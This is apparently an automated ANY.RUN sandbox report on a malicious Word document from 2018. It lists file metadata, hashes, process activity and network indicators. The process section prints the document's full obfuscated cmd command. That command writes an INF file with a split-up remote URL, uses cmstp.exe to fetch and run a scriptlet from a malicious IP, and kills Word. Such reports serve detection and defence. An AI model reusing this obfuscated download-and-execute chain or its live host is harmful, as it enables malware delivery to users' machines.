File name: dab3c2d1f6ab22c2b47dee48c1932dfcc06be7030e5e346041532d749da0e6bb.doc

Full analysis: https://app.any.run/tasks/af8fe284-e66a-47ec-8cdf-6370e5a1e70b
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Their capabilities vary by type, ranging from maintaining full remote control over the victim’s machine to stealing data and files and dropping other malware, and the main functionality of each trojan family differs significantly. The most common trojan infection chain starts with a phishing email.

Analysis date: November 08, 2018, 06:41:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Admin, Template: Normal.dotm, Last Saved By: cabane015 cabane015, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Wed Oct 17 02:44:00 2018, Last Saved Time/Date: Wed Nov 7 21:10:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 29, Security: 0
MD5: 89173C24DB6E9D1EDA4CE2BE04F25C59
SHA1: 3E598934BA1BCED054C77DD77E8AE1BDB6596B4E
SHA256: DAB3C2D1F6AB22C2B47DEE48C1932DFCC06BE7030E5E346041532D749DA0E6BB
SSDEEP: 1536:/am5PVc8cT9hFxkWWqIcvdeF3Q/quClKq+y:jcT9lkTcvchQ/iK/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • 32167.exe (PID: 2460)
  • SUSPICIOUS
    • Executable content was dropped or overwritten
      • cmstp.exe (PID: 3840)
    • Uses TASKKILL.EXE to kill Office Apps
      • cmd.exe (PID: 3284)
    • Creates files in the user directory
      • cmd.exe (PID: 3284)
      • cmstp.exe (PID: 3840)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3624)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3624)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 32
Paragraphs: 1
Lines: 1
Company:
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 29
Words: 4
Pages: 1
ModifyDate: 2018:11:07 21:10:00
CreateDate: 2018:10:17 01:44:00
TotalEditTime: 2.0 minutes
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: cabane015 cabane015
Template: Normal.dotm
Comments: -
Keywords: -
Author: Admin
Subject: -
Title: -
No data.
All screenshots are available in the full report
Total processes: 38
Monitored processes: 5
Malicious processes: 0
Suspicious processes: 0

Behavior graph

Processes shown in the graph: winword.exe, cmd.exe, cmstp.exe, taskkill.exe, 32167.exe (the interactive graph is available in the full report)

Process information

PID: 3624
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dab3c2d1f6ab22c2b47dee48c1932dfcc06be7030e5e346041532d749da0e6bb.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 1
Version: 14.0.6024.1000

PID: 3284
CMD: cmd /V /C set "Q_66=s" && !Q_66!et "Q_27=i" && !Q_66!et "Q_30=A" && !Q_66!et "Q_11=N" && !Q_66!et "Q_18=d" && c!Q_30!ll !Q_66!et "Q_23=%!Q_30!PP!Q_18!!Q_30!T!Q_30!%" && c!Q_30!ll !Q_66!et "Q_56=%R!Q_30!!Q_11!!Q_18!OM%" && !Q_66!et "Q_75=!Q_23!\M!Q_27!cro!Q_66!oft\!Q_56!.txt" && !Q_66!et "Q_64="^" && (For %i in ("[ver!Q_66!ion]" "!Q_66!ignature=$Wi!Q_11!dow!Q_66! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "!Q_30!dvancedINF=2.5" "[DefaultIn!Q_66!tall_SingleU!Q_66!er]" "UnRegi!Q_66!terOCXs=Q_4" "[Q_4]" "%11%\%Q_53_1%%Q_53_2%%Q_53_3%,NI,%Q_69_1%%Q_69_2%%Q_69_3%%Q_69_4%%Q_69_5%%Q_69_6%%Q_69_7%%Q_69_8%%Q_69_9%%Q_69_10%%Q_69_11%%Q_69_12%%Q_69_13%%Q_69_14%%Q_69_15%%Q_69_16%%Q_69_17%" "[!Q_66!tring!Q_66!]" "Q_69_1=ht" "Q_69_2=tp" "Q_69_3=:/" "Q_69_4=/7" "Q_69_5=8." "Q_69_6=12" "Q_69_7=8." "Q_69_8=92" "Q_69_9=.1" "Q_69_10=5/" "Q_69_11=J7" "Q_69_12=Dl" "Q_69_13=HF" "Q_69_14=zD" "Q_69_15=_1" "Q_69_16=.t" "Q_69_17=xt" "Q_53_2=rO" "Q_53_1=sC" "Q_53_3=bJ" ) do @echo %~i)>"!Q_75!" && echo !Q_66!erv!Q_27!ceName=!Q_64! !Q_64!>>!Q_75! && echo !Q_66!hortSvcN!Q_30!me=!Q_64! !Q_64!>>!Q_75! && c!Q_30!ll !Q_66!et "Q_77=%WI!Q_11!!Q_18!IR%" && !Q_66!t!Q_30!rt "" !Q_77!\Sy!Q_66!tem32\cm!Q_66!tp.exe /s /ns "!Q_75!" && !Q_66!t!Q_30!rt "" /M!Q_27!N t!Q_30!skk!Q_27!ll /F /!Q_27!M w!Q_27!nwor!Q_18!.exe
Path: C:\Windows\system32\cmd.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3840
CMD: C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\650.txt"
Path: C:\Windows\System32\cmstp.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Connection Manager Profile Installer
Exit code: 0
Version: 7.02.7600.16385 (win7_rtm.090713-1255)

PID: 4084
CMD: tAskkill /F /iM winword.exe
Path: C:\Windows\system32\taskkill.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Terminates Processes
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2460
CMD: "C:\Users\admin\32167.exe"
Path: C:\Users\admin\32167.exe
Parent process: cmstp.exe
User: admin
Company: Okta
Integrity Level: MEDIUM
Description: Developments Dsbugtrends Notifies
Total events: 1 213
Read events: 1 085
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 1
Suspicious files: 1
Text files: 5
Unknown types: 6

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2ECB.tmp.cvr | - | - | -
3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFCA2B53B56C625598.TMP | - | - | -
3624 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 1178BF800A7E9A315A240C34A220AC74 | D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7
3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\785E1420.wmf | wmf | 0B18A2DBC2AF888FAF6B3998AC5FAF7C | 104B08A36B1D1C4E249BC6314ECAF94AC7A39EE453EF0E28C7363F50477B5DF8
3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$b3c2d1f6ab22c2b47dee48c1932dfcc06be7030e5e346041532d749da0e6bb.doc | pgc | 25020A3D6C81C925619E5BF9C877A1A0 | BED9847647620E663FF2D305B84B7BE0635A39B2E731F0440BD248AF7E4D4128
3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FEBC5A1.wmf | wmf | D17879ACB9E2604D5E6ED9B2B0D0C950 | 0736B69348DA3F16210838C74F2B209DE9C6679AA4C4FC778F0D2FA5F2147E0A
3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | A60424C1EEECBB49D67CC4ED6756C474 | A3B4138B04919F98B4802D1AF26B4BEF13E1B6B1931D8036DBB935A04C1FC77D
3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E8403EFF-BCAF-412C-8F18-FD4E1930B72F}.tmp | binary | E369744C1B06BD25FE6EF73DE2AE0959 | 5D0559A508665D64A2D50F558D4A876000D9FAEA826AC1A06CD1CEBFD063FCA8
3840 | cmstp.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\J7DlHFzD_1[1].txt | xml | B10C94F8763CF2A18FA2F370B75CD7B6 | 3FABB4580F8CFBE7CE56F1BD2C81FBA8BA38DE37A6C244D8D812C2EA542E925F
3284 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\650.txt | ini | 210901254D442CC5F12FB3D5A29BD20B | 889FC28FB68A7156879FDE5481BEB7D850345904A31384F7BA7E3B2A38A6E216
Download the PCAP, analyze network streams, HTTP content and a lot more in the full report.
HTTP(S) requests: 1
TCP/UDP connections: 1
DNS requests: 0
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3840 | cmstp.exe | GET | 200 | 78.128.92.15:80 | http://78.128.92.15/J7DlHFzD_1.txt | BG | xml | 435 Kb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3840 | cmstp.exe | 78.128.92.15:80 | - | BelCloud Hosting Corporation | BG | malicious

DNS requests

No data

Threats

PID | Process | Class | Message
3840 | cmstp.exe | A Network Trojan was detected | MALWARE [PTsecurity] Squiblydoo Scriptlet
1 ETPRO signature is available in the full report.
No debug info